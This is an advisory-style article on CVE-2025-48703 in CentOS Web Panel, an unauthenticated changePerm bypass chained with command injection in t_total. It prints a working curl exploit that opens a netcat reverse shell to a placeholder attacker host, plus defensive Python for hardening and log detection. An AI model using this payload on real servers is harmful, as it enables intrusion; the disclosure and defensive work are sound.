A critical security vulnerability in CentOS Web Panel (CWP) has been discovered that allows unauthenticated remote attackers to execute arbitrary commands on affected servers.
The flaw, tracked as CVE-2025-48703, affects one of the most widely used free web hosting control panels, with over 200,000 instances identified globally through Shodan searches.
Summary
1. CentOS Web Panel's file management system fails to verify user credentials, allowing attackers to access restricted endpoints by simply removing user identifiers from URLs.
2. The t_total parameter is passed unsanitized into the chmod command that the panel runs through the system shell, so command substitution syntax placed in it executes arbitrary shell commands.
3. Chained together, the two flaws let an unauthenticated attacker run commands with the privileges of the targeted panel user from a single curl request, for example to spawn a reverse shell.
4. Roughly 200,000 CWP instances are exposed worldwide; versions 0.9.8.1204 and 0.9.8.1188 are confirmed affected, and CVE-2025-48703 is patched in version 0.9.8.1205, released in June 2025.
Authentication Bypass & Command Injection Flaws
The vulnerability stems from improper authentication verification in CWP’s file management system.
Security researcher Maxime Rinaudo discovered that the user panel’s file permission change functionality fails to properly validate user credentials.
When legitimate users modify file permissions through the web interface, the system generates HTTP POST requests to /cwp_30776ec647a8f390/myuser/myuser/index.php?module=filemanager&acc=changePerm.
However, attackers can bypass authentication entirely by removing user identifiers from the URL path.
A malicious request can be as simple as POST /myuser/index.php?module=filemanager&acc=changePerm, sent without any authentication cookies or session tokens.
The only requirement is knowledge of a valid non-root username created within the CWP admin interface. The vulnerable request is multipart form data carrying parameters such as fileName and currentPath and, critically, t_total, which specifies the permission mode to apply.
This authentication bypass affects CWP versions 0.9.8.1204 and 0.9.8.1188 running on CentOS 7 systems. The second component of the chain is command injection through the t_total parameter.
This parameter, intended to carry the permission mode for the chmod command, is not sanitized, and because the assembled command string is handed to a shell, attackers can inject arbitrary shell commands using command substitution syntax.
When the server processes a permission change it runs a command of the form chmod 644 "/home/myuser/.bashrc" through the system shell.
By placing a payload such as $(arbitrary_command), or the equivalent backtick notation, in t_total, an attacker achieves remote code execution with the privileges of the target user account.
The exploitation chain can be demonstrated with a single curl request (target, username, attacker_ip and the port are placeholders):
curl -kis 'https://target:2083/username/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/username&t_total=$(nc attacker_ip 9999 -e /bin/bash)'
The server-side shell expands the command substitution, establishing a reverse shell to attacker_ip:9999 and granting the attacker interactive access as the targeted user. Note that the -e option requires a netcat build that supports it; other reverse-shell one-liners work equally well in its place.
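To make the mechanism concrete, the following is an added Python model of the t_total flaw next to a hardened version. It is not CWP's code (CWP is written in PHP), and the function names, scratch file names and payload are constructed for illustration: the vulnerable version splices the user-supplied mode into a shell command string exactly as the article describes, so the shell expands $(...) before chmod runs; the hardened version restricts the mode to octal digits and calls chmod directly, with no shell involved.

```python
"""Added example, not CWP's code: a Python model of the t_total command
injection and of a hardened permission change that never touches a shell."""
import os
import re
import subprocess
import tempfile

# A chmod mode is three or four octal digits and nothing else.
MODE_RE = re.compile(r"^[0-7]{3,4}$")


def change_perm_vulnerable(path: str, t_total: str) -> int:
    """Hypothetical stand-in for the flawed behaviour: the user-supplied mode is
    spliced into a command string that a shell interprets, so $(...) and
    backticks are expanded before chmod ever runs."""
    cmd = f'chmod {t_total} "{path}"'
    return subprocess.run(cmd, shell=True, check=False).returncode


def change_perm_hardened(path: str, t_total: str) -> int:
    """Allow-list the mode and call chmod(2) directly: no shell, no expansion."""
    if not MODE_RE.fullmatch(t_total):
        raise ValueError(f"invalid permission mode: {t_total!r}")
    os.chmod(path, int(t_total, 8))
    return 0


def is_injection_attempt(t_total: str) -> bool:
    """Cheap pre-check usable at the request boundary (e.g. in a WAF rule)."""
    return MODE_RE.fullmatch(t_total) is None


def demo() -> dict:
    """Drive both versions with an injected mode against scratch files and
    report whether the injected command's side effect actually happened."""
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "dot_bashrc")        # constructed stand-in for ~/.bashrc
    marker_vuln = os.path.join(workdir, "marker_vuln")  # created only if the injection runs
    marker_hard = os.path.join(workdir, "marker_hard")
    open(target, "w").close()
    results = {}

    # Constructed payload in the shape the article describes: a valid-looking
    # mode followed by a command substitution (here it merely touches a file).
    change_perm_vulnerable(target, f"644 $(touch {marker_vuln})")
    results["vulnerable_ran_injection"] = os.path.exists(marker_vuln)

    try:
        change_perm_hardened(target, f"644 $(touch {marker_hard})")
        results["hardened_rejected"] = False
    except ValueError:
        results["hardened_rejected"] = True
    results["hardened_ran_injection"] = os.path.exists(marker_hard)

    # Legitimate input still works through the hardened path.
    change_perm_hardened(target, "600")
    results["mode_after_hardened"] = oct(os.stat(target).st_mode & 0o777)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the hardened version is not the regex alone: even a perfectly validated mode should never be concatenated into a shell command string, because the fix then depends on every future caller remembering to validate. Using the chmod library call removes the shell from the picture entirely.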
| Risk Factors | Details |
| --- | --- |
| Affected Products | CentOS Web Panel versions 0.9.8.1204 and 0.9.8.1188 running on CentOS 7 systems |
| Impact | Unauthenticated Remote Code Execution (RCE) as the targeted panel user |
| Exploit Prerequisites | Knowledge of a valid non-root username created in CWP; network access to the CWP user panel (typically port 2083); a basic HTTP client (curl, browser, etc.) |
| CVSS 3.1 Score | Estimated 9.0 or higher (Critical) |
Widespread Impact and Metasploit Integration
CentOS Web Panel serves as a free alternative to commercial solutions like cPanel and Plesk, managing essential services including Apache/NGINX web servers, MySQL/MariaDB databases, email systems, and DNS configurations.
The vulnerability’s impact is amplified by CWP’s global adoption across dedicated servers and VPS hosting environments.
Security researchers have already begun building automated exploitation tools: a Metasploit module pull request (#20344) has been opened against the rapid7/metasploit-framework repository, a sign of both the severity of the vulnerability and its potential for widespread exploitation.
The proof-of-concept code demonstrates reliable exploitation against vulnerable instances accessible on port 2083.
CWP developers responded promptly after responsible disclosure on May 13, 2025. CVE-2025-48703 was assigned on May 23, and a fix shipped in version 0.9.8.1205 in June 2025.
Organizations running CWP should upgrade to 0.9.8.1205 or later immediately and audit their systems for indicators of compromise, including unexpected outbound network connections originating from the web-panel user and unauthorized modifications to files in user home directories.
The vulnerability’s simplicity and the availability of working exploits make it a significant threat to unpatched CWP installations worldwide.
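For the audit recommended above, here is an added detection script that is not from the article, CWP or the researcher. It scans web-server access-log lines for the two request shapes the article describes: a filemanager changePerm request whose path lacks the /cwp_<hex>/ session prefix seen in the legitimate example URL (the auth-bypass shape), and a t_total value carrying shell metacharacters (the injection shape). It assumes the panel's web server logs in Apache combined format and that legitimate user-panel requests always carry that prefix; the sample log lines are constructed. Access logs do not record POST bodies, so the URL shape is the primary indicator and t_total is checked only when it appears in the query string.

```python
"""Added example, not CWP's code: flag access-log lines whose shape matches the
CWP changePerm auth bypass and t_total injection described in the article."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/NGINX combined-format request line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Legitimate user-panel requests in the article sit under /cwp_<hex>/<user>/<user>/;
# the bypass simply omits that prefix (assumption: the prefix is always present
# on authenticated requests).
SESSION_PREFIX_RE = re.compile(r"^/cwp_[0-9a-f]+/")
# Characters that have no business in a chmod mode: substitution, separators, pipes.
SHELL_META_RE = re.compile(r"[$`;&|()]")

# Constructed sample log lines; only the second and third should be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2025:12:00:01 +0000] "POST /cwp_30776ec647a8f390/myuser/myuser/index.php?module=filemanager&acc=changePerm HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2025:12:00:09 +0000] "POST /myuser/index.php?module=filemanager&acc=changePerm HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2025:12:00:10 +0000] "GET /myuser/index.php?module=filemanager&acc=changePerm&t_total=644%20%24(id) HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jul/2025:12:00:30 +0000] "GET /index.php?module=dashboard HTTP/1.1" 200 1024',
]


def classify(line: str):
    """Return a list of findings for a suspicious changePerm request, or None if
    the line is unparseable, is not a changePerm request, or looks legitimate."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query)  # percent-decodes values for us
    if qs.get("module") != ["filemanager"] or qs.get("acc") != ["changePerm"]:
        return None
    findings = []
    if not SESSION_PREFIX_RE.match(parts.path):
        findings.append("changePerm without /cwp_<hex>/ session prefix (auth-bypass shape)")
    if any(SHELL_META_RE.search(v) for v in qs.get("t_total", [])):
        findings.append("shell metacharacters in t_total (command-injection shape)")
    return findings or None


def scan(lines):
    """Run classify() over every line and collect the suspicious ones."""
    hits = []
    for line in lines:
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append({"ip": m.group("ip"), "method": m.group("method"),
                         "target": m.group("target"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["target"])
        for finding in hit["findings"]:
            print("   -", finding)
```

A hit on the first shape alone is already worth investigating: a changePerm request outside the session-prefixed path should not occur during normal use of the panel. Pair the source IPs with outbound connection logs from the same window to confirm whether a reverse shell was actually established.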